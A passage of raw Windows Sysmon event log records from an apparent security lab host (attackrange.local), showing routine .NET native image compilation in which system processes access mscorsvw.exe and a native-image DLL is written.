13:50:08.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A503-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.338{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A503-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.338{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A503-00000000A301}2752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A403-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.291{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A403-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.291{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A403-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A303-00000000A301}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.213{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A303-00000000A301}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.213{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A303-00000000A301}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.181{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A203-00000000A301}3528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.166{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A203-00000000A301}3528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.166{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A203-00000000A301}3528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.119{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A103-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.119{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A103-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.119{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A103-00000000A301}2232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-A003-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-AC03-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:09.869{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-AC03-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.869{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-AC03-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 
10341000x80000000000000007968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-AB03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.666{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-AB03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:09.666{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-AB03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:09.603{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f4c-0\Microsoft.Transactions.Bridge.Dtc.dll2021-01-18 13:50:09.603 10341000x80000000000000007964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:09.431{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W